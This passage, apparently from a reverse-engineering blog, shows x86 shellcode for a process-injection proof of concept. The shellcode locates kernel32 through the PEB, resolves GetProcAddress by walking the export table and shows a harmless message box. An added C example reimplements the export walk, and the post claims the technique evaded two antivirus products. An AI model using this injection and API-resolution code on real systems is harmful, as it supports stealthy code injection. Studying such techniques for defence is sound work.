<li><div>    pushfd</div></li>
<li><div>    pushad</div></li>
<li><div></div></li>
<li><div>;--------------------------------------+---------------------------------------+</div></li>
<li><div>;______________________________FIND KERNEL32 ADDRESS___________________________|</div></li>
<li><div>;--------------------------------------+---------------------------------------+</div></li>
<li><div>    ; address 0x30 of the TEB contains</div></li>
<li><div></div></li>
<li><div>    mov ebp, esp</div></li>
<li><div>    sub esp, 3*4</div></li>
<li><div>    %define _KernelAddr ebp-4</div></li>
<li><div>    %define _GetProcAddress ebp-8</div></li>
<li><div>    %define KernelType ebp-12</div></li>
<li><div></div></li>
<li><div>    mov eax, [fs:30h]          ; a pointer to the PEB.</div></li>
<li><div>    test eax, eax              ; this pointer is signed on 9x kernel,</div></li>
<li><div>    js Kernel_9x               ; and is unsigned on NT kernel.</div></li>
<li><div></div></li>
<li><div>Kernel_NT:</div></li>
<li><div>    mov eax, [eax+00Ch]        ; to an internal structure called _PEB_LDR_DATA</div></li>
<li><div>    mov esi, [eax+01Ch]        ; esi=InInitializationOrderModuleList</div></li>
<li><div>    lodsd                      ; eax=Forward Link of kernel32</div></li>
<li><div>    mov eax, [eax+08h]         ; eax=kernel32 image_base</div></li>
<li><div>    inc byte [KernelType]      ; identify the kernel type: 1=NT;0=9x</div></li>
<li><div>    jmp FindKernel32_end</div></li>
<li><div></div></li>
<li><div>Kernel_9x:</div></li>
<li><div>    mov eax, [eax+034h]        ; to a HeapHandle table</div></li>
<li><div>    mov eax, [eax+0B8h]        ; eax=kernel32 image base</div></li>
<li><div>    and byte [KernelType], 0   ; type=0</div></li>
<li><div></div></li>
<li><div>FindKernel32_end:</div></li>
<li><div>    mov dword [_KernelAddr], eax</div></li>
<li><div></div></li>
<li><div>;--------------------------------------+---------------------------------------+</div></li>
<li style="font-family: 'Courier New', Courier, monospace; color: 
black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;_____________________________RETRIEVE GETPROCADDRESS__________________________|</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;--------------------------------------+---------------------------------------+ </span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">edx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edx=K32 image base</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;">03Ch</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;eax=PE signature</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span 
style="color: #46aa03; font-weight:bold;">edx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+<span style="color: #46aa03; font-weight:bold;">eax</span>+78h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edx=export table RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">edx</span>, <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edx=export VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ecx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+18h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ecx=number of exports (exports "by name")</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> 
<span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+20h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=name RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=name VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> FindGPA_loop:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jecxz</span> Find_GPA_end <span style="color: #adadad; font-style: italic;">;if ecx=0, no match so we exit</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; 
font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">dec</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> <span style="color: #adadad; font-style: italic;">;dec ecx till we find GPA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">esi</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">ebx</span>+<span style="color: #46aa03; font-weight:bold;">ecx</span>*<span style="color: #ff0000;">4</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;esi=function name RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">esi</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;esi=function name</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 
'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">edi</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edi</span>+@<span style="color: #0000ff;">name</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edi=the name we want</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> __1: </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">cmpsb</span> <span style="color: #adadad; font-style: italic;">;cmp byte after byte</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jnz</span> FindGPA_loop <span style="color: #adadad; font-style: italic;">;different byte means "test the previous export"</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">cmp</span> <span style="color: #0000ff;">byte</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span>, <span style="color: #ff0000;">0</span> <span style="color: #adadad; font-style: italic;">;have we reached the end of the 
string?</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">je</span> __2 <span style="color: #adadad; font-style: italic;">;yes: find its address</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jmp</span> __1 <span style="color: #adadad; font-style: italic;">;no: test next bytes</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> __2:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+<span style="color: #ff0000;">024h</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=ordinal table RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: 
#00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=ordinal table VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">cx</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">ebx</span>+<span style="color: #46aa03; font-weight:bold;">ecx</span>*<span style="color: #ff0000;">2</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;cx=ordinal of GetProcAddress</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span> + <span style="color: #ff0000;">01ch</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=address table RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; 
font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=address table VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">ebx</span>+<span style="color: #46aa03; font-weight:bold;">ecx</span>*<span style="color: #ff0000;">4</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;eax=GetProcAddress RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;eax=address of GetProcAddress</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_GetProcAddress<span style="color: #66cc66;">]</span>,<span 
style="color: #46aa03; font-weight:bold;">eax</span> <span style="color: #adadad; font-style: italic;">;store it </span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> Find_GPA_end: </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>LoadLibStr + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: 
#66cc66;">[</span>_GetProcAddress<span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>User32Str + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>MessageBoxStr + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; 
font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_GetProcAddress<span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: #66cc66;">[</span>titlestr + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lea</span> <span style="color: #46aa03; font-weight:bold;">ecx</span> , <span style="color: 
#66cc66;">[</span>mess + <span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">ecx</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">esp</span> , <span style="color: #ff0000;">3</span>*<span style="color: #ff0000;">4</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">popad</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">popfd</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: 
black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">retn</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">@<span style="color: #0000ff;">name</span> <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"GetProcAddress"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">LoadLibStr <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"LoadLibraryA"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">User32Str <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"user32.dll"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">MessageBoxStr <span 
style="color: #0000ff;">db</span> <span style="color: #7f007f;">"MessageBoxA"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">titlestr <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"inject-lolz !"</span>,<span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">mess <span style="color: #0000ff;">db</span> <span style="color: #7f007f;">"Yé souis diabolique !!!!"</span>,<span style="color: #ff0000;">0</span></div></li></ol></pre>
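<p>To make the second half of the shellcode easier to follow, here is the same export-directory walk in plain C, as an added example (not the blog's code and not part of ZwMapLolzSection): it builds a constructed three-entry export table in a buffer and resolves a name through the AddressOfNames / AddressOfNameOrdinals / AddressOfFunctions tables at the offsets the shellcode reads. The module layout, the RVAs and the decoy export name <code>GetProcAddressForCaller</code> are all made up for the example and say nothing about any real kernel32.</p>

```c
/* Added example (not the blog's code): the export-directory walk the shellcode
 * performs, rewritten in C over a constructed in-memory "module" so it runs on
 * any host without Windows. Field offsets are those of IMAGE_EXPORT_DIRECTORY,
 * the same ones the shellcode reads: +14h NumberOfFunctions, +18h NumberOfNames,
 * +1Ch AddressOfFunctions, +20h AddressOfNames, +24h AddressOfNameOrdinals. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IMAGE_SIZE     0x200
#define EXPORT_DIR_RVA 0x100  /* constructed layout: export directory       */
#define NAMES_RVA      0x140  /* AddressOfNames        (3 x uint32 RVA)     */
#define ORDS_RVA       0x160  /* AddressOfNameOrdinals (3 x uint16)         */
#define FUNCS_RVA      0x170  /* AddressOfFunctions    (3 x uint32 RVA)     */
#define STR_RVA        0x180  /* NUL-terminated export names                */

/* Explicit little-endian accessors: PE fields are LE whatever the host is. */
static uint32_t rd32(const uint8_t *p) { return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v; p[1] = v >> 8; }

/* Resolve an export by name, walking the name table from the last entry down
 * exactly like the shellcode's "dec ecx" loop. Returns the function RVA, or 0
 * if the name is absent or the directory points outside the image.
 * exact=1 compares the whole string. exact=0 reproduces the shellcode's cmpsb
 * loop, which stops at the end of the *wanted* string and therefore accepts
 * any export whose name merely starts with it. */
uint32_t resolve_export(const uint8_t *image, size_t image_size,
                        uint32_t export_rva, const char *wanted, int exact)
{
    if (export_rva + 0x28 > image_size) return 0;
    const uint8_t *ed = image + export_rva;
    uint32_t nfuncs = rd32(ed + 0x14), nnames = rd32(ed + 0x18);
    uint32_t funcs  = rd32(ed + 0x1C), names  = rd32(ed + 0x20), ords = rd32(ed + 0x24);
    if (names + 4ull * nnames > image_size || ords + 2ull * nnames > image_size ||
        funcs + 4ull * nfuncs > image_size) return 0;

    for (uint32_t i = nnames; i-- > 0; ) {
        uint32_t name_rva = rd32(image + names + 4 * i);
        if (name_rva >= image_size) return 0;
        const char *name = (const char *)image + name_rva;
        if (!memchr(name, 0, image_size - name_rva)) return 0;  /* unterminated name */
        int hit = exact ? strcmp(name, wanted) == 0
                        : strncmp(name, wanted, strlen(wanted)) == 0;
        if (!hit) continue;
        uint16_t ord = rd16(image + ords + 2 * i);   /* index into AddressOfFunctions */
        if (ord >= nfuncs) return 0;
        return rd32(image + funcs + 4 * ord);
    }
    return 0;
}

/* Build the constructed module: three exports, names sorted as a linker emits
 * them. "GetProcAddressForCaller" is a constructed decoy sharing the prefix. */
void build_fake_image(uint8_t *img)
{
    static const char *names[3] = { "CloseHandle", "GetProcAddress", "GetProcAddressForCaller" };
    static const uint32_t func_rva[3] = { 0x1000, 0x2000, 0x3000 };
    memset(img, 0, IMAGE_SIZE);
    uint8_t *ed = img + EXPORT_DIR_RVA;
    wr32(ed + 0x10, 1);          /* Base (first ordinal)   */
    wr32(ed + 0x14, 3);          /* NumberOfFunctions      */
    wr32(ed + 0x18, 3);          /* NumberOfNames          */
    wr32(ed + 0x1C, FUNCS_RVA);
    wr32(ed + 0x20, NAMES_RVA);
    wr32(ed + 0x24, ORDS_RVA);
    uint32_t str = STR_RVA;
    for (uint16_t i = 0; i < 3; i++) {
        size_t len = strlen(names[i]) + 1;
        memcpy(img + str, names[i], len);
        wr32(img + NAMES_RVA + 4 * i, str);
        wr16(img + ORDS_RVA + 2 * i, i);           /* name i -> function slot i */
        wr32(img + FUNCS_RVA + 4 * i, func_rva[i]);
        str += (uint32_t)len;
    }
}

/* Resolve a name against the constructed module (what the self-test calls). */
uint32_t lookup_in_fake(const char *wanted, int exact)
{
    uint8_t img[IMAGE_SIZE];
    build_fake_image(img);
    return resolve_export(img, IMAGE_SIZE, EXPORT_DIR_RVA, wanted, exact);
}

int main(void)
{
    printf("exact  GetProcAddress -> RVA 0x%x\n", lookup_in_fake("GetProcAddress", 1));
    printf("prefix GetProcAddress -> RVA 0x%x\n", lookup_in_fake("GetProcAddress", 0));
    printf("exact  NoSuchExport   -> RVA 0x%x\n", lookup_in_fake("NoSuchExport", 1));
    return 0;
}
```

<p>The <code>exact=0</code> mode mirrors the shellcode's cmpsb loop: it only checks that the wanted string is a prefix of the export name, so when a longer export sharing that prefix sits later in the sorted name table, the descending walk hits it first and returns the wrong address (here 0x3000 instead of 0x2000). Comparing through the terminator (<code>exact=1</code>) fixes that, and the bounds checks on every RVA are what you want before trusting a table that a hostile image may have crafted.</p>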
<p>The binaries are <a href="http://baboon.rce.free.fr/public/ZwMapLolzSection.rar" hreflang="fr">HERE</a>; to test them, launch notepad and then ZwMapLolzSection.exe, and a cute little message box "Yé souis diabolique !!!!" should appear ;)</p>
<p>Finally, this injection technique was not detected by Kaspersky Internet Security 2010 nor by nod32 (thanks 0vercl0k[]), but it should be, given the simplicity of the method ...</p>
<p>I'm a bit too lazy to develop this post any further, so if you have questions: mon_super_pseudo [patat-at] lyua [pouin] org, or leave me a little comment.</p>